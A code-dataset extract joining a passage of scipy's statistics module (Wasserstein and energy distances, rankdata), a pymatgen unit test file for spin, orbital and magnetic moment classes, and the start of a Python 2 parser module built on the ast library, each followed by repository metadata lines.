functions located at the specified values.
References
----------
.. [1] "Wasserstein metric", https://en.wikipedia.org/wiki/Wasserstein_metric
.. [2] Ramdas, Garcia, Cuturi "On Wasserstein Two Sample Testing and Related
Families of Nonparametric Tests" (2015). :arXiv:`1509.02237`.
Examples
--------
>>> from scipy.stats import wasserstein_distance
>>> wasserstein_distance([0, 1, 3], [5, 6, 8])
5.0
>>> wasserstein_distance([0, 1], [0, 1], [3, 1], [2, 2])
0.25
>>> wasserstein_distance([3.4, 3.9, 7.5, 7.8], [4.5, 1.4],
... [1.4, 0.9, 3.1, 7.2], [3.2, 3.5])
4.0781331438047861
"""
return _cdf_distance(1, u_values, v_values, u_weights, v_weights)
def energy_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""Compute the energy distance between two 1D distributions.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The energy distance between two distributions :math:`u` and :math:`v`, whose
respective CDFs are :math:`U` and :math:`V`, equals to:
.. math::
D(u, v) = \left( 2\mathbb E|X - Y| - \mathbb E|X - X'| -
\mathbb E|Y - Y'| \right)^{1/2}
where :math:`X` and :math:`X'` (resp. :math:`Y` and :math:`Y'`) are
independent random variables whose probability distribution is :math:`u`
(resp. :math:`v`).
As shown in [2]_, for one-dimensional real-valued variables, the energy
distance is linked to the non-distribution-free version of the Cramér-von
Mises distance:
.. math::
D(u, v) = \sqrt{2} l_2(u, v) = \left( 2 \int_{-\infty}^{+\infty} (U-V)^2
\right)^{1/2}
Note that the common Cramér-von Mises criterion uses the distribution-free
version of the distance. See [2]_ (section 2), for more details about both
versions of the distance.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Energy distance", https://en.wikipedia.org/wiki/Energy_distance
.. [2] Szekely "E-statistics: The energy of statistical samples." Bowling
Green State University, Department of Mathematics and Statistics,
Technical Report 02-16 (2002).
.. [3] Rizzo, Szekely "Energy distance." Wiley Interdisciplinary Reviews:
Computational Statistics, 8(1):27-38 (2015).
.. [4] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
Examples
--------
>>> from scipy.stats import energy_distance
>>> energy_distance([0], [2])
2.0000000000000004
>>> energy_distance([0, 8], [0, 8], [3, 1], [2, 2])
1.0000000000000002
>>> energy_distance([0.7, 7.4, 2.4, 6.8], [1.4, 8. ],
... [2.1, 4.2, 7.4, 8. ], [7.6, 8.8])
0.88003340976158217
"""
return np.sqrt(2) * _cdf_distance(2, u_values, v_values,
u_weights, v_weights)
def _cdf_distance(p, u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute, between two one-dimensional distributions :math:`u` and
:math:`v`, whose respective CDFs are :math:`U` and :math:`V`, the
statistical distance that is defined as:
.. math::
l_p(u, v) = \left( \int_{-\infty}^{+\infty} |U-V|^p \right)^{1/p}
p is a positive parameter; p = 1 gives the Wasserstein distance, p = 2
gives the energy distance.
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
"""
u_values, u_weights = _validate_distribution(u_values, u_weights)
v_values, v_weights = _validate_distribution(v_values, v_weights)
u_sorter = np.argsort(u_values)
v_sorter = np.argsort(v_values)
all_values = np.concatenate((u_values, v_values))
all_values.sort(kind='mergesort')
# Compute the differences between pairs of successive values of u and v.
deltas = np.diff(all_values)
# Get the respective positions of the values of u and v among the values of
# both distributions.
u_cdf_indices = u_values[u_sorter].searchsorted(all_values[:-1], 'right')
v_cdf_indices = v_values[v_sorter].searchsorted(all_values[:-1], 'right')
# Calculate the CDFs of u and v using their weights, if specified.
if u_weights is None:
u_cdf = u_cdf_indices / u_values.size
else:
u_sorted_cumweights = np.concatenate(([0],
np.cumsum(u_weights[u_sorter])))
u_cdf = u_sorted_cumweights[u_cdf_indices] / u_sorted_cumweights[-1]
if v_weights is None:
v_cdf = v_cdf_indices / v_values.size
else:
v_sorted_cumweights = np.concatenate(([0],
np.cumsum(v_weights[v_sorter])))
v_cdf = v_sorted_cumweights[v_cdf_indices] / v_sorted_cumweights[-1]
# Compute the value of the integral based on the CDFs.
# If p = 1 or p = 2, we avoid using np.power, which introduces an overhead
# of about 15%.
if p == 1:
return np.sum(np.multiply(np.abs(u_cdf - v_cdf), deltas))
if p == 2:
return np.sqrt(np.sum(np.multiply(np.square(u_cdf - v_cdf), deltas)))
return np.power(np.sum(np.multiply(np.power(np.abs(u_cdf - v_cdf), p),
deltas)), 1/p)
def _validate_distribution(values, weights):
"""
Validate the values and weights from a distribution input of `cdf_distance`
and return them as ndarray objects.
Parameters
----------
values : array_like
Values observed in the (empirical) distribution.
weights : array_like
Weight for each value.
Returns
-------
values : ndarray
Values as ndarray.
weights : ndarray
Weights as ndarray.
"""
# Validate the value array.
values = np.asarray(values, dtype=float)
if len(values) == 0:
raise ValueError("Distribution can't be empty.")
# Validate the weight array, if specified.
if weights is not None:
weights = np.asarray(weights, dtype=float)
if len(weights) != len(values):
raise ValueError('Value and weight array-likes for the same '
'empirical distribution must be of the same size.')
if np.any(weights < 0):
raise ValueError('All weights must be non-negative.')
if not 0 < np.sum(weights) < np.inf:
raise ValueError('Weight array-like sum must be positive and '
'finite. Set as None for an equal distribution of '
'weight.')
return values, weights
return values, None
#####################################
# SUPPORT FUNCTIONS #
#####################################
RepeatedResults = namedtuple('RepeatedResults', ('values', 'counts'))
def find_repeats(arr):
"""Find repeats and repeat counts.
Parameters
----------
arr : array_like
Input array. This is cast to float64.
Returns
-------
values : ndarray
The unique values from the (flattened) input that are repeated.
counts : ndarray
Number of times the corresponding 'value' is repeated.
Notes
-----
In numpy >= 1.9 `numpy.unique` provides similar functionality. The main
difference is that `find_repeats` only returns repeated values.
Examples
--------
>>> from scipy import stats
>>> stats.find_repeats([2, 1, 2, 3, 2, 2, 5])
RepeatedResults(values=array([2.]), counts=array([4]))
>>> stats.find_repeats([[10, 20, 1, 2], [5, 5, 4, 4]])
RepeatedResults(values=array([4., 5.]), counts=array([2, 2]))
"""
# Note: always copies.
return RepeatedResults(*_find_repeats(np.array(arr, dtype=np.float64)))
def _sum_of_squares(a, axis=0):
"""Square each element of the input array, and return the sum(s) of that.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
sum_of_squares : ndarray
The sum along the given axis for (a**2).
See Also
--------
_square_of_sums : The square(s) of the sum(s) (the opposite of
`_sum_of_squares`).
"""
a, axis = _chk_asarray(a, axis)
return np.sum(a*a, axis)
def _square_of_sums(a, axis=0):
"""Sum elements of the input array, and return the square(s) of that sum.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
square_of_sums : float or ndarray
The square of the sum over `axis`.
See Also
--------
_sum_of_squares : The sum of squares (the opposite of `square_of_sums`).
"""
a, axis = _chk_asarray(a, axis)
s = np.sum(a, axis)
if not np.isscalar(s):
return s.astype(float) * s
else:
return float(s) * s
def rankdata(a, method='average', *, axis=None):
"""Assign ranks to data, dealing with ties appropriately.
By default (``axis=None``), the data array is first flattened, and a flat
array of ranks is returned. Separately reshape the rank array to the
shape of the data array if desired (see Examples).
Ranks begin at 1. The `method` argument controls how ranks are assigned
to equal values. See [1]_ for further discussion of ranking methods.
Parameters
----------
a : array_like
The array of values to be ranked.
method : {'average', 'min', 'max', 'dense', 'ordinal'}, optional
The method used to assign ranks to tied elements.
The following methods are available (default is 'average'):
* 'average': The average of the ranks that would have been assigned to
all the tied values is assigned to each value.
* 'min': The minimum of the ranks that would have been assigned to all
the tied values is assigned to each value. (This is also
referred to as "competition" ranking.)
* 'max': The maximum of the ranks that would have been assigned to all
the tied values is assigned to each value.
* 'dense': Like 'min', but the rank of the next highest element is
assigned the rank immediately after those assigned to the tied
elements.
* 'ordinal': All values are given a distinct rank, corresponding to
the order that the values occur in `a`.
axis : {None, int}, optional
Axis along which to perform the ranking. If ``None``, the data array
is first flattened.
Returns
-------
ranks : ndarray
An array of size equal to the size of `a`, containing rank
scores.
References
----------
.. [1] "Ranking", https://en.wikipedia.org/wiki/Ranking
Examples
--------
>>> from scipy.stats import rankdata
>>> rankdata([0, 2, 3, 2])
array([ 1. , 2.5, 4. , 2.5])
>>> rankdata([0, 2, 3, 2], method='min')
array([ 1, 2, 4, 2])
>>> rankdata([0, 2, 3, 2], method='max')
array([ 1, 3, 4, 3])
>>> rankdata([0, 2, 3, 2], method='dense')
array([ 1, 2, 3, 2])
>>> rankdata([0, 2, 3, 2], method='ordinal')
array([ 1, 2, 4, 3])
>>> rankdata([[0, 2], [3, 2]]).reshape(2,2)
array([[1. , 2.5],
[4. , 2.5]])
>>> rankdata([[0, 2, 2], [3, 2, 5]], axis=1)
array([[1. , 2.5, 2.5],
[2. , 1. , 3. ]])
"""
if method not in ('average', 'min', 'max', 'dense', 'ordinal'):
raise ValueError('unknown method "{0}"'.format(method))
if axis is not None:
a = np.asarray(a)
if a.size == 0:
# The return values of `normalize_axis_index` are ignored. The
# call validates `axis`, even though we won't use it.
# use scipy._lib._util._normalize_axis_index when available
np.core.multiarray.normalize_axis_index(axis, a.ndim)
dt = np.float64 if method == 'average' else np.int_
return np.empty(a.shape, dtype=dt)
return np.apply_along_axis(rankdata, axis, a, method)
arr = np.ravel(np.asarray(a))
algo = 'mergesort' if method == 'ordinal' else 'quicksort'
sorter = np.argsort(arr, kind=algo)
inv = np.empty(sorter.size, dtype=np.intp)
inv[sorter] = np.arange(sorter.size, dtype=np.intp)
if method == 'ordinal':
return inv + 1
arr = arr[sorter]
obs = np.r_[True, arr[1:] != arr[:-1]]
dense = obs.cumsum()[inv]
if method == 'dense':
return dense
# cumulative counts of each unique value
count = np.r_[np.nonzero(obs)[0], len(obs)]
if method == 'max':
return count[dense]
if method == 'min':
return count[dense - 1] + 1
# average method
return .5 * (count[dense] + count[dense - 1] + 1)
|
andyfaff/scipy
|
scipy/stats/_stats_py.py
|
Python
|
bsd-3-clause
| 315,230
|
[
"DIRAC"
] |
1d183588f52175dca307a48e58755955133517b925e1e448f6316aa315d01925
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import unittest
from pymatgen.core import Lattice
from pymatgen.electronic_structure.core import Orbital, Spin, Magmom
import numpy as np
class SpinTest(unittest.TestCase):
def test_init(self):
self.assertEqual(int(Spin.up), 1)
self.assertEqual(int(Spin.down), -1)
def test_from_int(self):
self.assertEqual(Spin(1), Spin.up)
self.assertEqual(Spin(-1), Spin.down)
self.assertRaises(ValueError, Spin, 0)
def test_cached(self):
self.assertEqual(id(Spin(1)), id(Spin.up))
class OrbitalTest(unittest.TestCase):
def test_init(self):
for orb in Orbital:
self.assertEqual(Orbital(orb.value), orb)
self.assertRaises(ValueError, Orbital, 100)
def test_cached(self):
self.assertEqual(id(Orbital(0)), id(Orbital.s))
class MagmomTest(unittest.TestCase):
def test_init(self):
# backwards compatibility for scalar-like magmoms
magmom = Magmom(2.0)
self.assertEqual(float(magmom), 2.0)
# backwards compatibility for list-like magmoms
magmom2 = Magmom([1, 2, 3])
self.assertEqual(list(magmom2), [1, 2, 3])
self.assertEqual(magmom2.global_moment.tolist(), [1, 2, 3])
# non-default saxis, normalized internally
magmom3 = Magmom([1, 2, 3], saxis=[1, 1, 1])
self.assertTrue(np.allclose(magmom3.saxis, [np.sqrt(1/3.)]*3))
# test construction from known global moment and desired, non-default saxis
magmom4 = Magmom.from_global_moment_and_saxis([1, 2, 3], saxis=[1, 0, 0])
self.assertTrue(np.allclose(magmom4.moment, [-3, 2, 1]))
# test global moments with non-default saxis
magmom5 = Magmom([-3, 2, 1], saxis=[1, 0, 0])
self.assertTrue(np.allclose(magmom5.global_moment, [1, 2, 3]))
def test_get_moments(self):
# simple cases
magmom_along_x = Magmom([1, 0, 0])
self.assertTrue(np.allclose(magmom_along_x.get_moment(saxis=[1, 0, 0]), [0, 0, 1]))
magmom_along_y = Magmom([0, 1, 0])
self.assertTrue(np.allclose(magmom_along_y.get_moment(saxis=[0, 1, 0]), [0, 0, 1]))
# test transformations
magmoms = [[0, 0, 0],
[0, 0, 1],
[0, 0, -1],
[1, 2, 3],
[-1, 2, 3],
[-1, -2, -3]]
for magmom in magmoms:
magmom1 = Magmom(magmom)
# transform to non-default saxis
magmom2 = magmom1.get_00t_magmom_with_xyz_saxis()
# and back to default saxis
magmom3 = magmom2.get_xyz_magmom_with_001_saxis()
self.assertTrue(np.allclose(magmom1.moment, magmom))
self.assertTrue(np.allclose(magmom1.saxis, [0, 0, 1]))
self.assertTrue(np.allclose(magmom1.get_moment(saxis=magmom1.saxis), magmom1.moment))
self.assertTrue(np.allclose(magmom1.get_moment(saxis=magmom2.saxis), magmom2.moment))
self.assertTrue(np.allclose(magmom2.get_moment(saxis=[0, 0, 1]), magmom1.moment))
self.assertTrue(np.allclose(magmom2.get_moment(saxis=magmom2.saxis), magmom2.moment))
self.assertTrue(np.allclose(magmom3.moment, magmom1.moment))
def test_is_collinear(self):
magmoms_list = [[0, 0, 0],
[1, 1, 1],
[[0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 1], [0, 0, 1], [0, 0, 1]],
[[0, 0, -1], [0, 0, 1], [0, 0, 1]],
[[2, 2, 2], [-2, -2, -2], [2, 2, 2]]]
for magmoms in magmoms_list:
self.assertEqual(Magmom.are_collinear(magmoms), True)
ncl_magmoms = [[[0, 0, 1], [0, 0, 1], [1, 2, 3]]]
self.assertEqual(Magmom.are_collinear(ncl_magmoms), False)
def test_have_consistent_saxis(self):
magmom1 = Magmom([1, 2, 3])
magmom2 = Magmom([1, 2, 3])
magmom3 = Magmom([1, 2, 3], saxis=[0, 0, -1])
magmom4 = Magmom([1, 2, 3], saxis=[1, 2, 3])
self.assertTrue(Magmom.have_consistent_saxis([magmom1, magmom2]))
self.assertFalse(Magmom.have_consistent_saxis([magmom1, magmom3]))
self.assertFalse(Magmom.have_consistent_saxis([magmom1, magmom4]))
def test_get_consistent_set_and_saxis(self):
magmoms = [1, 1, 2, 2, 0, 0, 2]
magmoms, saxis = Magmom.get_consistent_set_and_saxis(magmoms)
self.assertTrue(np.allclose(saxis, [0, 0, 1]))
magmoms = [[0, 0, 0],
[1, 1, 1],
[2, 2, 2]]
magmoms, saxis = Magmom.get_consistent_set_and_saxis(magmoms)
self.assertTrue(np.allclose(saxis, [np.sqrt(1/3.)]*3))
def test_relative_to_crystal_axes(self):
lattice = Lattice.from_parameters(5, 10, 5, 90, 110, 90)
moment = [1, 0, 2]
magmom = Magmom.from_moment_relative_to_crystal_axes(moment, lattice)
self.assertTrue(np.allclose(magmom.moment, [0.93969262, 0.0, 1.65797986]))
self.assertTrue(np.allclose(magmom.get_moment_relative_to_crystal_axes(lattice), moment))
def test_equality(self):
self.assertTrue(Magmom([1, 1, 1]) == Magmom([1, 1, 1]))
self.assertFalse(Magmom([1, 1, 2]) == Magmom([1, 1, 1]))
self.assertTrue(Magmom([0, 0, 10]) == 10)
def test_negative(self):
self.assertEqual(-Magmom([1, 2, 3]), Magmom([-1, -2, -3]))
if __name__ == '__main__':
unittest.main()
|
setten/pymatgen
|
pymatgen/electronic_structure/tests/test_core.py
|
Python
|
mit
| 5,593
|
[
"pymatgen"
] |
a6c73a8387626c2d383d2e254c627539ad223ef2ae7a53e2f743598b33b7cef1
|
""" Parse Python source code.
This module provides a Parser class that may be used to parse Python source code
and retrieve various information from its abstract syntax tree.
"""
import __builtin__
import ast
import collections
import imp
import keyword
import string
##
# TODO
# - Handle global and nonlocal variables
# - Add support for underlining builtin variables and functions
# - Fix underlining variables in comprehensions
# - Currently the first name in the comp is considered part of the outside
# scope, when it should be linked with the next name
##
##
# \brief A namedtuple containing information about a function/class definition.
#
# \details The namedtuple has five fields: title (first line of definition),
# range (the line range), docstring, and type (one of function, class,
# or method).
#
_Definition = collections.namedtuple('_Definition', ['title', 'range',
'docstring', 'type'])
##
# \brief A namedtuple containing information about a navigation item.
#
# \details The namedtuple has two fields: name and type (as in _Definition).
#
NavigationItem = collections.namedtuple('NavigationItem', ['name', 'type'])
##
# \brief A namedtuple containing information about a variable location.
#
# \details The namedtuple has two fields: lineno and col_offset.
#
_VariableNode = collections.namedtuple('NavigationItem',
['lineno', 'col_offset'])
class Parser(object):
""" Provides an interface for parsing Python source code.
This class uses the source code string of Python code to generate an
abstract syntax tree for parsing. It provides several methods for retrieving
information about the tree, including variables defined and documentation
for functions and classes.
"""
def __init__(self, source=""):
""" Initialize the Parser class.
Keyword arguments:
source -> The source code string.
"""
self._tree = None
self._source = None
self.source = source
@property
def source(self):
""" Return the source code string. """
return self._source
@source.setter
def source(self, new_source):
""" Set and parse the source code.
If parsing the source fails, the source is not set, the tree is not
updated, and an exception is raised from the ast.parse method.
"""
self._tree = ast.parse(new_source)
self._source = unicode(new_source, 'UTF-8')
@property
def tree(self):
""" Return an abstract syntax tree of the source string. """
return self._tree
def variables(self, index):
""" Return a dict of defined variable names mapped to their index.
From the tree, extract all variable names from assignments and add all
Python keywords and function names that were not previously defined.
Parsing is done by finding the path that the index is on (by converting
it to a line number) after moving the line number backwards to the
previous non-whitespace-only line. Builtin variables are mapped to -1.
Arguments
index -> the index defining the scope of the search.
"""
# find previous line with any non-whitespace characters
lineno = self._calculate_lineno(index)
lines = self._source.splitlines()[:lineno]
while lines and (lines[-1] == "" or lines[-1].isspace()):
lines.pop()
new_lineno = len(lines)
# parse path in tree with node at line number
parser = _AssignParser()
parser.lineno = new_lineno
path = _get_path(self._tree, new_lineno)
for node in path:
parser.visit(node)
# calculate node index from line number and column offset
variables = {name: set(_calculate_index(self._source, node.lineno,
node.col_offset)
for node in nodes)
for (name, nodes) in parser.variables.items()}
# add builtins
builtins = dir(__builtin__) + keyword.kwlist
for builtin in builtins:
if builtin not in variables:
variables[builtin] = []
return {variable: (max(indices) if indices else -1)
for (variable, indices) in variables.items()}
def variable_indices(self, index):
""" Return a list of ranges for where the variable at index is used.
This method finds the variable name at the index and parses the tree
to find its scope. The scope is bounded by its first definition before
index and its first defintion after index (in the case of redefinition).
Each entry in the returned list is a 2-tuple with (index, length), where
length is the length of the variable.
Return an empty list if the index is out of bounds of the source, if no
word is at the index, or if the variable has not yet been defined.
"""
# Check index
if index < 0 or index >= len(self._source):
return []
# find variable name
variable = self._word_at_index(index)
if not variable:
return []
# find node defining the scope of the variable
lineno = self._calculate_lineno(index)
path = _get_path(self._tree, lineno)
scope_nodes = [node for node in reversed(path) if
isinstance(node, (ast.Module, ast.FunctionDef,
ast.ClassDef))]
scope_parser = _AssignParser(float('inf'))
for scope_node in scope_nodes:
scope_parser.visit(scope_node)
if variable in scope_parser.variables:
break
scope_parser.variables.clear()
else:
return [] # the variable name was not defined on the path
# find bounding definitions of variable in scope
variable_indices = sorted(_calculate_index(self._source, node.lineno,
node.col_offset)
for node in scope_parser.variables[variable])
prev_index = next((idx for idx in reversed(variable_indices)
if idx <= index), 0)
next_index = next((idx for idx in variable_indices if idx > index),
float('inf'))
# find ranges of all variable names within the scope
name_parser = _NameParser(variable)
name_parser.visit(scope_node)
name_indices = [_calculate_index(self._source, node.lineno,
node.col_offset)
for node in name_parser.names]
return [(idx, len(variable)) for idx in name_indices if
prev_index <= idx < next_index]
def documentation(self):
""" Return the documentation of functions and classes in an ast.
Extract the function names, class names, and all docstrings.
"""
def def_string(node, name):
""" Return a string of function line number, name and docstring. """
return "{0} {1}\n{2}".format(node.lineno, name,
ast.get_docstring(node) or "")
functions = {node.name: node for node in self._tree.body if
isinstance(node, ast.FunctionDef)}
for (i, name) in enumerate(functions):
node = functions[name]
functions[name] = def_string(node, name)
if i <= len(functions) - 1:
functions[name] += "\n\n"
classes = {node.name: node for node in self._tree.body if
isinstance(node, ast.ClassDef)}
for (i, name) in enumerate(classes):
node = classes[name]
classes[name] = def_string(node, name)
if i <= len(classes) - 1:
functions[name] += "\n\n"
documentation = "Functions\n\n"
function_names = functions.keys()
function_names.sort()
class_names = classes.keys()
class_names.sort()
for name in function_names:
documentation += functions[name]
documentation += "Classes\n\n"
for name in class_names:
documentation += classes[name]
return documentation
def navigation(self):
""" Return a dict navigatable sections in the source code.
Dict keys are the line ranges of the navigation item mapped to a
NavigationItem containing the name, including the parenthesized function
arguments/subclasses, and definition type.
"""
visitor = _DefinitionParser(self._source)
visitor.visit(self._tree)
return {item.range: NavigationItem(name=item.title, type=item.type)
for item in visitor.definitions}
def nestable_lines(self):
""" Return the range of lines that are nestable.
Parse the tree for all start and end lines of a nestable group (e.g. a
function defintion or if statement). For each, return a tuple of the
start and end line number.
"""
nests = []
nodes = [ast.walk(node) for node in self._tree.body]
for node in nodes:
end = 0
for subnode in node:
if isinstance(subnode, (ast.FunctionDef, ast.ClassDef, ast.If,
ast.For, ast.TryExcept,
ast.TryFinally)):
end = 0
for subsubnode in ast.walk(subnode):
try:
lineno = subsubnode.lineno
except AttributeError:
pass
else:
if lineno > end:
end = lineno
nests.append((subnode.lineno, end))
return nests
def modules(self):
""" Return a dict of module names and module info.
Each value of the dict is a list of functions and classes as returned by
get_functions() and get_classes().
"""
modules = {}
for node in self._tree.body:
for subnode in ast.walk(node):
if isinstance(subnode, ast.Import):
module_name = subnode.names[0].name
elif isinstance(subnode, ast.ImportFrom):
module_name = subnode.module
imported_name = subnode.names[0].name
else:
continue
try:
module_tree = _parse_module(module_name)
except TypeError: # .so files
loaded_module = imp.load_dynamic(
module_name, imp.find_module(module_name)[1])
module_info = dir(loaded_module)
except IOError: # directories
loaded_module = imp.load_package(
module_name, imp.find_module(module_name)[1])
module_info = dir(loaded_module)
else:
module_info = self._functions() + self._classes()
finally:
if isinstance(subnode, ast.ImportFrom):
if imported_name in module_info:
modules[imported_name] = module_info[imported_name]
else:
modules[module_name] = module_info
return modules
def _calculate_lineno(self, index):
""" Return the line number that contains the given index. """
lines = self._source.splitlines(True)
if lines:
idx = 0
for (lineno, line) in enumerate(lines):
idx += len(line)
if idx >= index:
break
return lineno + 1
else:
return 1
def _word_at_index(self, index):
""" Return the word at an index or an empty string if in a boundary. """
chars = string.letters + string.digits + '_'
anchor = next((idx + 1 for idx in reversed(xrange(index + 1))
if self._source[idx] not in chars), 0)
bound = next((idx for idx in xrange(index, len(self._source))
if self._source[idx] not in chars), len(self._source))
return self._source[anchor:bound]
class _DefinitionParser(ast.NodeVisitor):
""" A NodeVisitor subclass to parse an ast for function/class definitions.
Visit all function and class definitions. For class definitions, visit all
children and assign their type as a method.
"""
def __init__(self, source):
""" Initialize the object.
Arguments
source -> the source code string.
"""
self.definitions = []
self._source = source
def visit_FunctionDef(self, node):
""" Add the definition of a function.
The visited node is added as a _Definition namedtuple. If there is not a
docstring, return an empty string instead. The node's children are
visited with generic_visit.
"""
self.definitions.append(self._visit_def(node, 'function'))
self.generic_visit(node)
def visit_ClassDef(self, node):
""" Add the definition of a class.
The visited node is added as a _Definition namedtuple. If there is not a
docstring, return an empty string instead. The node's children are
visited and functions are added with type method.
"""
self.definitions.append(self._visit_def(node, 'class'))
# visit children to find methods
for subnode in ast.iter_child_nodes(node):
if isinstance(subnode, ast.FunctionDef):
self.definitions.append(self._visit_def(subnode, 'method'))
self.generic_visit(subnode)
def _visit_def(self, node, def_type):
""" Return a _Definition namedtuple for a FunctionDef or ClassDef node.
First, determine the line number of the node. Nodes may begin with
decorators. Therefore, search from the starting line number of the node
until reaching the definition title.
Then, get the title of the node. The title is the first line of the
definition with the 'def' or 'class' stripped off. If the line contains
the full definition (i.e., ends in a colon), strip that off too.
Otherwise, end with ellipses.
Arguments
node -> the node to visit. It must be one of ast.FunctionDef or
ast.ClassDef.
def_type -> a string representing the type of definition (function,
class, or method).
"""
# determine line prefix
if isinstance(node, ast.FunctionDef):
prefix = 'def '
elif isinstance(node, ast.ClassDef):
prefix = 'class '
else:
raise ValueError(node)
# find starting lineno, skipping decorators
lineno = node.lineno
for line in self._source.splitlines()[node.lineno-1:]:
if line.strip().startswith(prefix):
break
lineno += 1
# get title
title = self._source.splitlines()[lineno-1].strip()
# strip off opening keyword and handle end of title
title = title[len(prefix):]
if title.endswith(':'):
title = title[:-1]
else:
title += ' ...'
# return _Definition namedtuple
end_lineno = self._node_end(node)
return _Definition(title=title,
range=(lineno, end_lineno - lineno + 1),
docstring=ast.get_docstring(node) or '',
type=def_type)
@staticmethod
def _node_end(node):
""" Return the ending line number of a node.
The end line number is calculated by visiting all subnodes using the
ast.walk function from the input argument node and set to the visited node
with the highest line number.
Arguments:
node -> the node. It must have a lineno attribute.
"""
end_lineno = node.lineno
for child in ast.walk(node):
try:
lineno = child.lineno
except AttributeError:
continue
if lineno > end_lineno:
end_lineno = lineno
return end_lineno
class _NameParser(ast.NodeVisitor):
""" A NodeVisitor subclass that parses an ast for nodes matching a name. """
def __init__(self, name):
""" Initialize the object with a name to find in the tree. """
self.name = name
self.names = set()
def visit_Name(self, node):
""" Visit a name. """
self._add_node(node, node.id)
def _visit_def(self, node):
""" Add the definition's name and generic_visit it.
The col_offset of the node is incremented to account for the def or
class string preceding the name of the definition.
"""
if isinstance(node, ast.FunctionDef):
node.col_offset += len('def ')
elif isinstance(node, ast.ClassDef):
node.col_offset += len('class ')
self._add_node(node, node.name)
self.generic_visit(node)
visit_FunctionDef = _visit_def
visit_ClassDef = _visit_def
def _add_node(self, node, name):
""" Add a node to the names dict.
Create a _VariableNode namedtuple and add it to the set at the key
'name' in the dict.
"""
if name == self.name:
self.names.add(_VariableNode(lineno=node.lineno,
col_offset=node.col_offset))
class _AssignParser(ast.NodeVisitor):
""" A NodeVisitor subclass that parses an ast for assignment variables.
Assignment variables are only saved if within the scope at a given line
number.
"""
def __init__(self, lineno=0):
""" Initialize the object with a line number.
Keyword arguments:
lineno -> the line number defining the parse scope.
"""
self.variables = collections.defaultdict(list)
self.lineno = lineno
def visit(self, node):
""" Visit a node if its line number is <= self.lineno. """
if (hasattr(node, 'lineno') and node.lineno <= self.lineno or
not hasattr(node, 'lineno')):
super(_AssignParser, self).visit(node)
def visit_Module(self, node):
""" Visit a module.
Add all defined variables and function/class definitions. Definition
names are added to the variables dict. Other nodes are visited with the
visit method.
"""
for subnode in node.body:
if isinstance(subnode, (ast.FunctionDef, ast.ClassDef)):
self._add_node(subnode, subnode.name)
else:
self.visit(subnode)
def visit_Assign(self, node):
""" Process all targets of an assignment.
This method uses the _visit_assign_target instance method.
"""
for target in node.targets:
self._visit_assign_target(target)
self.generic_visit(node)
def visit_For(self, node):
""" Visit a for loop.
Store all variables defined in its body as well as the variables
targeted in the loop definition.
"""
self._visit_assign_target(node.target)
self.generic_visit(node)
def _visit_comprehension(self, node):
""" Visit a list, dict, set, or genexp comprehension.
Iterate over all of the node's generators, visit the target
(the 'x' in "...for x in..."), and add them to the variables list.
If the target is a tuple, visit its elts.
"""
for comprehension in node.generators:
try:
name = comprehension.target.id
except AttributeError:
for elt in comprehension.target.elts:
self._add_node(elt, elt.id)
else:
self._add_node(comprehension.target, name)
visit_ListComp = _visit_comprehension
visit_SetComp = _visit_comprehension
visit_DictComp = _visit_comprehension
visit_GeneratorExp = _visit_comprehension
def _visit_def(self, node):
""" Visit a function/class definition.
Visit all nodes in the definition body. If one of these subnodes is
another definition, only add its name to the variables list. Otherwise,
visit it normally. Add the name of the definition node to the variables
list.
"""
for subnode in node.body:
if (isinstance(subnode, (ast.FunctionDef, ast.ClassDef)) and
subnode.lineno <= self.lineno):
self._add_node(subnode, subnode.name)
else:
self.visit(subnode)
self._add_node(node, node.name)
def visit_FunctionDef(self, node):
""" Visit a function definition.
This method uses the _visit_def instance method. If the node line number
is less than self.lineno, add all argument names to the variables list.
"""
self._visit_def(node)
if node.lineno < self.lineno:
for arg in node.args.args:
self._add_node(arg, arg.id)
visit_ClassDef = _visit_def
def _visit_import(self, node):
""" Visit an import or import from statement.
If the module is imported as another name, store that variable name;
otherwise, store the module name.
"""
for name in node.names:
if name.asname:
self._add_node(node, name.asname)
else:
self._add_node(node, name.name)
visit_Import = _visit_import
visit_ImportFrom = _visit_import
def _visit_assign_target(self, node):
""" Visit an assignment target.
Store the name or, if it is a tuple, all names within the tuple.
"""
try:
name = node.id
except AttributeError:
if isinstance(node, ast.Tuple):
for elt in node.elts:
self._add_node(elt, elt.id)
else:
self._add_node(node, name)
def _add_node(self, node, name):
""" Add a node to the variables dict.
Create a _VariableNode namedtuple and add it to the set at the key
'name' in the dict.
"""
self.variables[name].append(_VariableNode(lineno=node.lineno,
col_offset=node.col_offset))
def _iter_paths(tree, cur=()):
""" Return a generator of all paths in the abstract syntax tree.
